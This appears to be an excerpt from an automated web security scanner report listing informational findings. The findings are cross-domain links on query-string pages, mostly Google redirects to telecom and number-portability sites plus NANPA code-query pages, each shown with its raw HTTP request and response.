GET /url?sa=t&source=web&cd=8&ved=0CFoQFjAH&url=http%3A%2F%2Fnetvoipcommunications.com%2Fadditional-services.html&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNGfl5B0e2HD7DpZKbBuz_TUyCMMlQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://netvoipcommunications.com/additional-services.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:46:14 GMT
Server: gws
Content-Length: 254
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://netvoipcommunications.com/additional-services.html">here</A>
...[SNIP]...

18.20. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=5&ved=0CDIQFjAE&url=https%3A%2F%2Flnp.activationnow.com%2Flnp%2F&ei=Yi3LTfrUPOjz0gGrxNysCg&usg=AFQjCNHF7ZWuhtryZ0kWKCLF7bL-RcTJrg

The response contains the following link to another domain:

https://lnp.activationnow.com/lnp/

Request

GET /url?sa=t&source=web&cd=5&ved=0CDIQFjAE&url=https%3A%2F%2Flnp.activationnow.com%2Flnp%2F&ei=Yi3LTfrUPOjz0gGrxNysCg&usg=AFQjCNHF7ZWuhtryZ0kWKCLF7bL-RcTJrg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: https://lnp.activationnow.com/lnp/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:44:45 GMT
Server: gws
Content-Length: 231
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://lnp.activationnow.com/lnp/">here</A>
...[SNIP]...

18.21. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Fwww.onwav.com%2Flnp&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNGjDwcGuGT-B8V_1d8p_Ajfq3gw8Q

The response contains the following link to another domain:

http://www.onwav.com/lnp

Request

GET /url?sa=t&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Fwww.onwav.com%2Flnp&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNGjDwcGuGT-B8V_1d8p_Ajfq3gw8Q HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://www.onwav.com/lnp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:45:46 GMT
Server: gws
Content-Length: 221
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.onwav.com/lnp">here</A>
...[SNIP]...

18.22. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=3&ved=0CDoQFjAC&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNHNdM-cYvWXoU3W1ydPqQ_sUIsqtQ

The response contains the following link to another domain:

http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-

Request

GET /url?sa=t&source=web&cd=3&ved=0CDoQFjAC&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNHNdM-cYvWXoU3W1ydPqQ_sUIsqtQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:45:50 GMT
Server: gws
Content-Length: 266
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-">here</A>
...[SNIP]...

18.23. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=2&ved=0CDMQFjAB&url=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&ei=6C3LTa2FKIrk0QHGrqSNCQ&usg=AFQjCNFAy3i7_G8KU2C1siZDEqjgoqmZzw

The response contains the following link to another domain:

http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Request

GET /url?sa=t&source=web&cd=2&ved=0CDMQFjAB&url=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&ei=6C3LTa2FKIrk0QHGrqSNCQ&usg=AFQjCNFAy3i7_G8KU2C1siZDEqjgoqmZzw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:46:41 GMT
Server: gws
Content-Length: 319
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/">here</A>
...[SNIP]...

18.24. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=5&ved=0CEgQFjAE&url=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNGk9nmH5ofnm0A6jNQotXYW2a3qlA

The response contains the following link to another domain:

http://shop2.sprint.com/en/support/faq/wlnp.shtml

Request

GET /url?sa=t&source=web&cd=5&ved=0CEgQFjAE&url=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNGk9nmH5ofnm0A6jNQotXYW2a3qlA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://shop2.sprint.com/en/support/faq/wlnp.shtml
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:45:58 GMT
Server: gws
Content-Length: 246
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://shop2.sprint.com/en/support/faq/wlnp.shtml">here</A>
...[SNIP]...

18.25. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Fgvnwlnp.com%2F&ei=Yi3LTfrUPOjz0gGrxNysCg&usg=AFQjCNEosMpFF-tDMNqc_BlBs2j_3RTe3g

The response contains the following link to another domain:

http://gvnwlnp.com/

Request

GET /url?sa=t&source=web&cd=1&ved=0CBYQFjAA&url=http%3A%2F%2Fgvnwlnp.com%2F&ei=Yi3LTfrUPOjz0gGrxNysCg&usg=AFQjCNEosMpFF-tDMNqc_BlBs2j_3RTe3g HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://gvnwlnp.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:44:27 GMT
Server: gws
Content-Length: 216
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://gvnwlnp.com/">here</A>.

...[SNIP]...

18.26. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=3&ved=0CCIQFjAC&url=http%3A%2F%2Fforum.link2voip.com%2Fviewtopic.php%3Ff%3D19%26t%3D185&ei=Yi3LTfrUPOjz0gGrxNysCg&usg=AFQjCNG6OdgkMH4UtpEzIr75YnzJxDnRXg

The response contains the following link to another domain:

http://forum.link2voip.com/viewtopic.php?f=19&t=185

Request

GET /url?sa=t&source=web&cd=3&ved=0CCIQFjAC&url=http%3A%2F%2Fforum.link2voip.com%2Fviewtopic.php%3Ff%3D19%26t%3D185&ei=Yi3LTfrUPOjz0gGrxNysCg&usg=AFQjCNG6OdgkMH4UtpEzIr75YnzJxDnRXg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://forum.link2voip.com/viewtopic.php?f=19&t=185
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:44:41 GMT
Server: gws
Content-Length: 252
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://forum.link2voip.com/viewtopic.php?f=19&t=185">here</A>
...[SNIP]...

18.27. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=1&ved=0CC0QFjAA&url=http%3A%2F%2Fwww.vonage-forum.com%2Fforum8.html&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNEnH7DzrDvIuCvFg4lHGTrnfVudlg

The response contains the following link to another domain:

http://www.vonage-forum.com/forum8.html

Request

GET /url?sa=t&source=web&cd=1&ved=0CC0QFjAA&url=http%3A%2F%2Fwww.vonage-forum.com%2Fforum8.html&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNEnH7DzrDvIuCvFg4lHGTrnfVudlg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://www.vonage-forum.com/forum8.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:45:44 GMT
Server: gws
Content-Length: 236
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.vonage-forum.com/forum8.html">here</A>
...[SNIP]...

18.28. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=4&ved=0CEEQFjAD&url=http%3A%2F%2Fwww.job-search-engine.com%2Fkeyword%2Fnumber-portability%2F&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNHKn5My1J3cblRYVTP3u4zL3Hzbzg

The response contains the following link to another domain:

http://www.job-search-engine.com/keyword/number-portability/

Request

GET /url?sa=t&source=web&cd=4&ved=0CEEQFjAD&url=http%3A%2F%2Fwww.job-search-engine.com%2Fkeyword%2Fnumber-portability%2F&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNHKn5My1J3cblRYVTP3u4zL3Hzbzg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://www.job-search-engine.com/keyword/number-portability/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:45:52 GMT
Server: gws
Content-Length: 257
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.job-search-engine.com/keyword/number-portability/">here</A>
...[SNIP]...

18.29. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=6&ved=0CE4QFjAF&url=http%3A%2F%2Fwww.anpisolutions.com%2Fwholesale-voice-and-data-services%2Fsignaling-network-and-database-services%2Fgateway-services%2F&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNFUP1HzGY5K2Tw0BRRfPlcFoR2JNw

The response contains the following link to another domain:

http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/

Request

GET /url?sa=t&source=web&cd=6&ved=0CE4QFjAF&url=http%3A%2F%2Fwww.anpisolutions.com%2Fwholesale-voice-and-data-services%2Fsignaling-network-and-database-services%2Fgateway-services%2F&ei=mS3LTaatBIXc0QHL49DbCA&usg=AFQjCNFUP1HzGY5K2Tw0BRRfPlcFoR2JNw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=L7ViPyWtNgzLloKqxgGugf0ueZUZZRmZC8lN4Wr85n3qEmY_KVWo1yeYY5svbWvHVQq7yYmiauvxIuVqLhSFztFYtygC1RWC7aK_H70ahmu-9-agEoiTnLTH1Iyycesj

Response

HTTP/1.1 302 Found
Location: http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 12 May 2011 00:46:02 GMT
Server: gws
Content-Length: 317
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/">here</A>
...[SNIP]...

18.30. http://www.nationalnanpa.com/nas/public/assigned_code_query_display.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/assigned_code_query_display.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.nationalnanpa.com/nas/public/assigned_code_query_display.do?method=displayAssignedCodeQueryData

The response contains the following links to other domains:

http://www.nanpa.com/content/legalNotice.html
http://www.neustar.biz/

Request

POST /nas/public/assigned_code_query_display.do?method=displayAssignedCodeQueryData HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
Referer: http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do?method=selectNpas
Cache-Control: max-age=0
Origin: http://www.nationalnanpa.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=82268809.1305158784.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=82268809.597827469.1305158784.1305158784.1305158784.1; nanpaid=nf1vNL0Qhz7LjnCZwmBG3dy5hQCtnCVwhWVvQJJzxxb4hJgtm3h2!1521367000; BIGipServernas-ns=2869930176.20480.0000
Content-Length: 55

codeQueryModel.stateAbbr=AL&codeQueryModel.nasNpaId=205

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:14:49 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 279919

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<td align="left" valign="middle" width="81"><a href="http://www.neustar.biz" target="_blank"><img src="/nas/public/images/neustar_logo.gif" width="81" height="19" border="0" alt="www.neustar.biz">
...[SNIP]...
</span>
<a class="footer" href="http://www.nanpa.com/content/legalNotice.html">Legal Notice/Disclaimer</a>
...[SNIP]...

18.31. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationalnanpa.com
Path:	/nas/public/assigned_code_query_step1.do

Issue detail

The page was loaded from a URL containing a query string:

http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do?method=selectNpas

The response contains the following links to other domains:

http://www.nanpa.com/content/legalNotice.html
http://www.neustar.biz/

Request

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:12:32 GMT
Server: Apache
Set-Cookie: nanpaid=n9JhNL0QhPD1Fl4s2fQT8NrBVk0FBlYLJJHWG8dys0vSvJ5DMwWS!1521367000; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/
Content-Length: 18894

<html>
<head>
<LINK REL="stylesheet" href="/nas/public/css/neustar.css">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META NAME="EXPIRES" CONTENT="0">
<META NAME="CONTRIBUTORS"
...[SNIP]...
<td align="left" valign="middle" width="81"><a href="http://www.neustar.biz" target="_blank"><img src="/nas/public/images/neustar_logo.gif" width="81" height="19" border="0" alt="www.neustar.biz">
...[SNIP]...
</span>
<a class="footer" href="http://www.nanpa.com/content/legalNotice.html">Legal Notice/Disclaimer</a>
...[SNIP]...

18.32. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/checkout/person/ShipToInfo.html?Action=Check_Out&Template=NANPA%20Gear&MarketName_W=&MarketCode_W=&AuthorName_W=&PublisherName_W=&ISBN_W=&Start_W=1&End_W=10&NumToShow=10&Volume_W=&KeywordID_W=&Time=-1775926634&SessionID=123877210b1f1xo775o9i223siv0f2z7whc8raukm2fh5prl571g1cp127jk943s

The response contains the following links to other domains:

http://www.nanpa.org/about_overview.php
http://www.nanpa.org/awards_overview.php
http://www.nanpa.org/benefits_overview.php
http://www.nanpa.org/contact.php
http://www.nanpa.org/education_overview.php
http://www.nanpa.org/environment_overview.php
http://www.nanpa.org/events_overview.php
http://www.nanpa.org/index.php
http://www.nanpa.org/networking_overview.php
http://www.nanpa.org/photography_overview.php
http://www.nanpa.org/positions_overview.php
http://www.nanpa.org/publications_overview.php
http://www.nanpa.org/site_tools.php
http://www.nanpa.org/sitemap.php
http://www.nanpa.org/support_overview.php
https://s7.addthis.com/js/250/addthis_widget.js
https://www.addthis.com/bookmark.php?v=250
https://www.nanpa.org/copyrights.php
https://www.nanpa.org/help.php
https://www.nanpa.org/img/A_minus.gif
https://www.nanpa.org/img/A_plus.gif
https://www.nanpa.org/img/A_zero.gif
https://www.nanpa.org/img/NANPA_Logo.gif
https://www.nanpa.org/img/NANPA_bar.gif
https://www.nanpa.org/img/NANPA_tagline.gif
https://www.nanpa.org/img/joinNANPA.gif
https://www.nanpa.org/img/spacer.gif
https://www.nanpa.org/img/xbox_white.gif
https://www.nanpa.org/javascript/curr_year.js
https://www.nanpa.org/legal.php
https://www.nanpa.org/members.php
